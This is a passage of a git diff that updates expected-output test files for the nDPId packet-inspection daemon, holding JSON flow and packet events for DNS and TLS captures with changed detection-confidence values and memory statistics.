+00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00547{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":314,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1613939315239} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871737 bytes -~~ total memory freed........: 5871737 bytes -~~ total allocations/frees...: 118128/118128 +~~ total memory allocated....: 6005371 bytes +~~ total memory freed........: 6005371 bytes +~~ total allocations/frees...: 120890/120890 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 777 chars diff --git a/test/results/tls-appdata.pcap.out b/test/results/tls-appdata.pcap.out index 87f1885d2..bd39ee39e 100644 --- a/test/results/tls-appdata.pcap.out +++ b/test/results/tls-appdata.pcap.out @@ -2,21 +2,21 @@ 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1642636825083} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642636825083,"flow_last_seen":1642636825083,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1642636825083,"l3_proto":"ip4","src_ip":"179.60.195.173","dst_ip":"192.168.2.100","src_port":443,"dst_port":60636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642636825083,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1642636825083,"pkt":"YDjgxTWgeJS0JASgCABFAADTdsZAAFQGdWizPMOtwKgCZAG77NyYT4Q6bz7CkoAYARcapAAAAQEICuA9efAA6xLnFwMDAJq6kl+L8CkANElxlxEecHMQmMQNkeaHxIp41zgnfTmHWl1kbYylGWBjaZG2NzJzlVXZWLztslEjbtyBdUs5oPdXaxkx+\/Qqz25LpRnvI2Oa6mejiJQ6cva3m1sq7WKg7Tr1kRyTeD3F3LCkV1iqkLWh7Tv+UIHyUeGMLTuUM2Ln4Jd+SMy0A0nofS3noQlT0jEHIJotqStJgnoJ"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642636825083,"flow_last_seen":1642636825083,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1642636825083,"l3_proto":"ip4","src_ip":"179.60.195.173","dst_ip":"192.168.2.100","src_port":443,"dst_port":60636,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642636825083,"flow_last_seen":1642636825083,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1642636825083,"l3_proto":"ip4","src_ip":"179.60.195.173","dst_ip":"192.168.2.100","src_port":443,"dst_port":60636,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642636825184,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1642636825184,"pkt":"YDjgxTWgeJS0JASgCABFAAC7dsdAAFQGdX+zPMOtwKgCZAG77NyYT4TZbz7CkoAYARcjxAAAAQEICuA9elQA6xLnFwMDAIJ8qPBKps43VjN1CWNCU\/WQelHzsIBMbYPAQ\/uBSeCttdwQAVQSVQY\/KbbED1BcMIjBMrVVvujIJVS8087\/CMQGAwaAK+HgSw64pU81VCnjfYTfRMnDYpHQuxsdF63QBFPXffdndgc5510Oi0rcddoDPyb3I5kt\/aPyPwwpROArhlOP"} 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642636825195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1642636825195,"pkt":"YDjgxTWgeJS0JASgCABFAAC7dshAAFQGdX6zPMOtwKgCZAG77NyYT4TZbz7CkoAYARcjuQAAAQEICuA9el8A6xLnFwMDAIJ8qPBKps43VjN1CWNCU\/WQelHzsIBMbYPAQ\/uBSeCttdwQAVQSVQY\/KbbED1BcMIjBMrVVvujIJVS8087\/CMQGAwaAK+HgSw64pU81VCnjfYTfRMnDYpHQuxsdF63QBFPXffdndgc5510Oi0rcddoDPyb3I5kt\/aPyPwwpROArhlOP"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":429,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1643610288722} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643610288722,"flow_last_seen":1643610288722,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":1643610288722,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643610288722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1643610288722,"pkt":"eJS0JASgYDjgxTWgCABFAAXUr1ZAAG4GmdrAqAJkNN\/GB+ZgAbs5J4UhnRUwIFAQJz3DuQAAFwMDBbsPVRnTUZmGPBlnKdgK94iLfa1WzOumranE61s0xvAtVjrmnivoUriXENTZHZ6xJ+jtI02SpI1pRFy9oatnRAti+z3dflh9zDeImNOzWaaReV7pRcOrrq7tetZhYkU+J8nisBJ42M5+CPOJz2x9RWtShEja6uVC5aX31AdfQo20rLfO\/h359IB7fzanuauTs\/HdR9kryxM8fpmunMnX8WXp67VFyeXC9tn4sMVL2L1iFuAZ2WReqtOFPjc27OdH3FdONsJrS3rdK2QVlml0LGbtHI9L05So1IHq5iGWqnYrZQ589c78wmLTg0z6Ka0yN+W3FGjoIGV3+LcQLvz6QRgjR\/kIHAJohOAQCxTc9V8F6Gv4p79TOjrL8QYreKxwrcyV7t0\/ffxHqa6wsgnwahqHz5mGSmBc+NEk20kRh8LU5Ux04uV1MrApZkpFkwVelAuPdI3nbz4UYiSP08RLjt7FwNdonwA2wk0UsATBQ2iYBLpKcWy8MNYJXPH2+OoHv7AYz4ifKDgWz1xsViG63GdMyM6QWXC1knvXeFbsFV0zb686r04l1qD5DGVWted1hpWErKnl1mFLjhp7NBh19Fu92aw6Pp1LmbPygTeDVvX2BkgA980SLqucCK1QQ\/87Y2y1rEMBDJI337XRO9fLLom3N1GZGcfdjcOmFx23h3Xsl+JOKuIRqUHcNjsuWmsI93vxv7AiXhfl3ON6PBpCzXsWfQd5CnOow3DrBISIOf0QBKNxmFchEodhvvam7eYuYBOrQVQbZqwqAEmXVvmKkPfxg11O7945k9bJbHrHGnTHIJFPF8Wi5iInrrMIczLCm1Ty3X1uvh+KSzqOKu23gp0oy8tw8FSTiaFy88XbiN7NdhsKDDqcgzhRWXEyoPsqv8ZLHWmNQtFHEc1otdBhKSXxBo4sSfSRCFeFjnRiWuoJkIwrZr\/BJCPDk0kJntgUkKLVBB9u32VxY3auwEwW8zwog0Kk3+GGDIkvqFTJNbiOxAZx3Bh00tLdNxMKdSO2fUGW4NL+WwwvLg+eGNlmxqkHecoyIHU6SnMN0ibGz7t0FimXl9FSI77SBAp8XGca7+fLewD9OHIgZzvqQJhSicTTl9ZflYmqdns0hrrJmkNCykZ4VHxI+domV7DRJABw2KvQ0HwDx5SMRpKeA2sueP598Raa+9F37mFZha6n1dhCKRSIkHPBCXwqEfhybcdOppz7dducg\/rDRmksOfTm7RdRFeBiYRjuqqdrpfrvqj4+n50RtPuOEamaACLRJe6TZ7AW60wNgZ4dbP5mBUOsUL+tGIvS3nrV+yuTsPHrJLA6h95nQQJJp1gPln6Nqwtu9dkRRA6KEKJsdtHc3JqWZjaSLJzaseg\/8y7N52Wwn6qAh47XHIlR\/ujrZyknuYN7irKa4apesgI2eDCnzFOHgd17m7AHq7vKvKmnQgplT+sFJcUwVu3nfqOhQjoDv02P5GlZXrAskO+6m+j9jtZMWk5ljB89fKaXNeLo2zjdBvluIThOvbDD4qSD+Jyi+\/ACr297jxF4hgS34EXR2bPMBCWBQ7weITTmdrwxEGtvfRK6RrUaKt0mA7Mmh2K3xkeJIyTQWAWBfCDfp+4+jtl\/HFNZ3X72EWk2uH6pI3SkOAUM71ZFkDV0zGFae0Xl1Uvj44SLDq0NxVlzOiFLtUYYjE6EZp45LPVhL8l6xcclI4RpJZwSBG5E9xwp658S+bV\/0zFdLWUxoCdi1hOVc+KmQMRQFDNgNxnLdxBG\/I6e1KPzAP3ozk4qy5VXGqPMtnuKoWBMuYqKTJjEAlG62upJHVz1g7aZjkN7ewqhTZXT4U3\/nLD+KKBpRA+6aGJQ3Wk\/Yc7YyxkVi+HCxxNdytkZcR22mmETB+o4WMzW60Iu0eFVoPREMdUcI4HUkA0F\/UGykYOAX3kyJbTw"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643610288724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643610288724,"pkt":"eJS0JASgYDjgxTWgCABFAAA8r1dAAG4Gn3HAqAJkNN\/GB+ZgAbs5J4rNnRUwIFAYJz2+IQAAaUBxB\/Gc\/nglm3L+T6FaB1y1dAs="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643610288722,"flow_last_seen":1643610288724,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":736,"midstream":1,"thread_ts_msec":1643610288724,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643610288722,"flow_last_seen":1643610288724,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":736,"midstream":1,"thread_ts_msec":1643610288724,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1643610288737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1643610288737,"pkt":"YDjgxTWgeJS0JASgCABFAAAoJklAADkGXZQ038YHwKgCZAG75mCdFTAgOSeK4VAQCRZvcQAAAAAAAAAA"} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642636825083,"flow_last_seen":1642636825303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":71,"midstream":1,"thread_ts_msec":1643610288741,"l3_proto":"ip4","src_ip":"179.60.195.173","dst_ip":"192.168.2.100","src_port":443,"dst_port":60636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1643610288722,"flow_last_seen":1643610304703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":34835,"flow_avg_l4_payload_len":1088,"midstream":1,"thread_ts_msec":1643610304703,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} +00655{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1643610288722,"flow_last_seen":1643610304703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":34835,"flow_avg_l4_payload_len":1088,"midstream":1,"thread_ts_msec":1643610304703,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-payload-len":41014,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1643611942615} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-payload-len":70000,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1643612754900} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-payload-len":98963,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1643614758865} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":120,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1643610288722,"flow_last_seen":1643614758886,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":112952,"flow_avg_l4_payload_len":990,"midstream":1,"thread_ts_msec":1643614758886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":120,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1643610288722,"flow_last_seen":1643614758886,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":112952,"flow_avg_l4_payload_len":990,"midstream":1,"thread_ts_msec":1643614758886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":120,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":120,"packets-processed":120,"total-skipped-flows":0,"total-l4-payload-len":113381,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1643614758886} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 120/120 @@ -26,9 +26,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5912858 bytes -~~ total memory freed........: 5912858 bytes -~~ total allocations/frees...: 118244/118244 +~~ total memory allocated....: 6046492 bytes +~~ total memory freed........: 6046492 bytes +~~ total allocations/frees...: 121006/121006 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2416 chars diff --git a/test/results/tls-esni-fuzzed.pcap.out b/test/results/tls-esni-fuzzed.pcap.out index e6bb181a8..2c096430b 100644 --- a/test/results/tls-esni-fuzzed.pcap.out +++ b/test/results/tls-esni-fuzzed.pcap.out @@ -2,13 +2,13 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 